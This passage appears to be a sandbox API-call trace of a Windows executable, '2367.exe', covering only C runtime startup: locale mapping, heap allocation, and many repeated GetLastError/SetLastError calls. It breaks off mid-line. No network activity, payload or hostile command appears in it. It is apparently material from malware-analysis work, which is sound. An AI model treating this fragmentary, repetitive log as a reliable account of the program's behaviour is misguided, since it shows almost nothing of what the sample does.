!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㯫⡓押@Ā") returned 256 [0111.914] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㯫⡓押@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0111.914] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㯫⡓押@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0111.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÚ\x97.)\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0111.915] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4aeee0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe")) returned 0x2e [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.915] SetLastError (dwErrCode=0x0) [0111.915] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.916] GetLastError () returned 0x0 [0111.916] SetLastError (dwErrCode=0x0) [0111.917] GetLastError () returned 0x0 [0111.919] SetLastError (dwErrCode=0x0) [0111.919] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.920] GetLastError () returned 0x0 [0111.920] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.921] SetLastError (dwErrCode=0x0) [0111.921] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.922] SetLastError (dwErrCode=0x0) [0111.922] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.923] SetLastError (dwErrCode=0x0) [0111.923] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.924] SetLastError (dwErrCode=0x0) [0111.924] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.925] SetLastError (dwErrCode=0x0) [0111.925] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x64) returned 0x211990 [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.926] SetLastError (dwErrCode=0x0) [0111.926] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.927] SetLastError (dwErrCode=0x0) [0111.927] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.928] GetLastError () returned 0x0 [0111.928] SetLastError (dwErrCode=0x0) [0111.929] GetLastError () returned 0x0 [0111.929] SetLastError (dwErrCode=0x0) [0111.929] GetLastError () returned 0x0 [0111.930] SetLastError (dwErrCode=0x0) [0111.930] GetLastError () returned 0x0 [0111.930] SetLastError (dwErrCode=0x0) [0111.930] GetLastError () returned 0x0 [0111.930] SetLastError (dwErrCode=0x0) [0111.930] GetLastError () returned 0x0 [0111.930] SetLastError (dwErrCode=0x0) [0111.930] GetLastError () returned 0x0 [0111.930] SetLastError (dwErrCode=0x0) [0111.930] GetLastError () returned 0x0 [0111.930] SetLastError (dwErrCode=0x0) [0111.930] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.931] SetLastError (dwErrCode=0x0) [0111.931] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.932] GetLastError () returned 0x0 [0111.932] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.933] SetLastError (dwErrCode=0x0) [0111.933] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.934] GetLastError () returned 0x0 [0111.934] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.935] SetLastError (dwErrCode=0x0) [0111.935] GetLastError () returned 0x0 [0111.936] SetLastError (dwErrCode=0x0) [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x98) returned 0x211a00 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1f) returned 0x211aa0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x36) returned 0x211ac8 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x37) returned 0x211b08 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3c) returned 0x211b48 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x31) returned 0x211b90 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x211bd0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x24) returned 0x211bf0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x14) returned 0x211c20 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xd) returned 0x211c40 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x25) returned 0x211c58 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x39) returned 0x211c88 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x18) returned 0x211cd0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x211cf0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xe) returned 0x211d10 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x69) returned 0x211d28 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3e) returned 0x211da0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1b) returned 0x211de8 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1d) returned 0x211e10 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x48) returned 0x211e38 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x12) returned 0x211e88 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x18) returned 0x211ea8 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1b) returned 0x211ec8 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x24) returned 0x211ef0 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x29) returned 0x211f20 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1e) returned 0x211f58 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x41) returned 0x211f80 [0111.936] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x211fd0 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xf) returned 0x211ff0 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x16) returned 0x212008 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2a) returned 0x212028 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x29) returned 0x212060 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x15) returned 0x212098 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1e) returned 0x2120b8 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2a) returned 0x2120e0 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x12) returned 0x212118 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x18) returned 0x212138 [0111.937] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x46) returned 0x212158 [0111.937] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x2111f8 | out: hHeap=0x210000) returned 1 [0111.937] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0111.937] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0111.937] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0111.939] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x80) returned 0x2111f8 [0111.939] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x800) returned 0x2121a8 [0111.939] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x2111f8) returned 0x80 [0111.940] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40b5f8) returned 0x0 [0111.940] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x2111f8) returned 0x80 [0111.941] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x2111f8) returned 0x80 [0111.942] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x2111f8) returned 0x80 [0111.942] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x2111f8) returned 0x80 [0111.943] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x2111f8) returned 0x80 [0111.943] GetLastError () returned 0x0 [0111.943] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.944] GetLastError () returned 0x0 [0111.944] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.945] SetLastError (dwErrCode=0x0) [0111.945] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.946] GetLastError () returned 0x0 [0111.946] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.947] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.947] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.947] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.947] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.947] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.947] SetLastError (dwErrCode=0x0) [0111.947] GetLastError () returned 0x0 [0111.948] SetLastError (dwErrCode=0x0) [0111.948] GetLastError () returned 0x0 [0111.948] SetLastError (dwErrCode=0x0) [0111.948] GetLastError () returned 0x0 [0111.948] SetLastError (dwErrCode=0x0) [0111.948] GetLastError () returned 0x0 [0111.948] SetLastError (dwErrCode=0x0) [0111.948] GetLastError () returned 0x0 [0111.948] SetLastError (dwErrCode=0x0) [0111.948] GetLastError () returned 0x0 [0111.949] SetLastError (dwErrCode=0x0) [0111.949] GetLastError () returned 0x0 [0111.949] SetLastError (dwErrCode=0x0) [0111.949] GetLastError () returned 0x0 [0111.949] SetLastError (dwErrCode=0x0) [0111.949] GetLastError () returned 0x0 [0111.949] SetLastError (dwErrCode=0x0) [0111.949] GetLastError () returned 0x0 [0111.949] SetLastError (dwErrCode=0x0) [0111.949] GetLastError () returned 0x0 [0111.949] SetLastError (dwErrCode=0x0) [0111.949] GetLastError () returned 0x0 [0111.950] SetLastError (dwErrCode=0x0) [0111.950] GetLastError () returned 0x0 [0111.950] 